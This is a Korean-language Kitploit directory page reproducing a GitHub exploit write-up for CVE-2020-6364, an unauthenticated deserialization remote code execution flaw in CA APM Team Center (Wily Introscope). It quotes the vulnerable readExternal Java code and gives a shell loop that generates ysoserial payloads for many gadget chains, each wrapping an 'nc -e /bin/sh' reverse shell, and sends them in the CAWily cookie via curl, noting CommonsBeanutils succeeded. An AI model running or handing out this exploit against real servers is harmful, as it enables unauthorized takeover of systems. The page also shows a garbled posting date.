Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2020-6364 — CA APM Team Center (Wily Introscope)에서의 원격 코드 실행 | Kitploit
도구/GitHubGitHub/gquere/cve-2020-6364
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubgquere/cve-2020-6364

CVE-2020-6364

CA APM Team Center (Wily Introscope)에서의 원격 코드 실행

저장소 보기
224년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2020-6364

CA APM Team Center (Wily Introscope)에서의 원격 코드 실행.

원본 권고

CA APM Team Center의 역직렬화 취약점으로 인해 서버에서 인증되지 않은 원격 코드 실행이 발생합니다.

서버에 인증할 때 악명 높은 rO0 문자열로 시작하는 쿠키가 반환되는데, 이는 base64로 인코딩된 직렬화 객체를 나타냅니다.

정적으로 문제를 완전히 추적하지는 않았지만, 다음 코드가 취약점이 있는 코드일 것입니다.

root@kitploit:~
public class HttpRequestHeaderInfo implements Externalizable {
  public void readExternal(ObjectInput in) throws IOException, ClassNotFoundException {

    in.readInt();
    int numMapEntries = in.readInt();
    this.fRequestParameterMap = (numMapEntries == 0) ? Collections.EMPTY_MAP : new HashMap(numMapEntries);

    for (int i = 0; i < numMapEntries; i++) {
      this.fRequestParameterMap.put(in.readUTF(), in.readObject());
    }

    int numCookies = in.readInt();
    this.fCookies = (numCookies == 0) ? kNoCookies : new Cookie[numCookies];

    for (int j = 0; j < this.fCookies.length; j++) {
      this.fCookies[j] = new Cookie((String)in.readObject(), (String)in.readObject());
    }
  }
}

매개변수 맵과 쿠키가 사용자 입력의 readObject()를 사용하여 역직렬화된다는 점에 주목하세요.

이는 for 루프에서 적절한 가젯을 식별하여 쉽게 악용됩니다.

root@kitploit:~
for gadget in AspectJWeaver BeanShell1 C3P0 Click1 Clojure CommonsBeanutils1 CommonsCollections1 CommonsCollections2 CommonsCollections3 CommonsCollections4 CommonsCollections5 CommonsCollections6 CommonsCollections7 FileUpload1 Groovy1 Hibernate1 Hibernate2 JBossInterceptors1 JRMPClient JRMPListener JSON1 JavassistWeld1 Jdk7u21 Jython1 MozillaRhino1 MozillaRhino2 Myfaces1 Myfaces2 ROME Spring1 Spring2 URLDNS Vaadin1 Wicket1
do
    java -jar ./ysoserial-0.0.6-SNAPSHOT-all.jar $gadget "nc -e /bin/sh ..." | base64 -w0 > cookie
    payload=$(cat cookie)
    curl -s -k 'https://remoteserver/' -X POST -H "Cookie: CAWily=$payload"
done

저에게 원격 코드 실행을 가능하게 한 유일한 페이로드는 CommonsBeanutils였습니다. 포함된 JAR은 org.apache.commons_beanutils_1.9.2.1.jar이며, maven 저장소에 따르면 실제로 취약한 가젯을 포함하고 있습니다.

감사

헤더를 다시 확인하도록 해준 특별한 누군가에게 감사드립니다.

도구 다운로드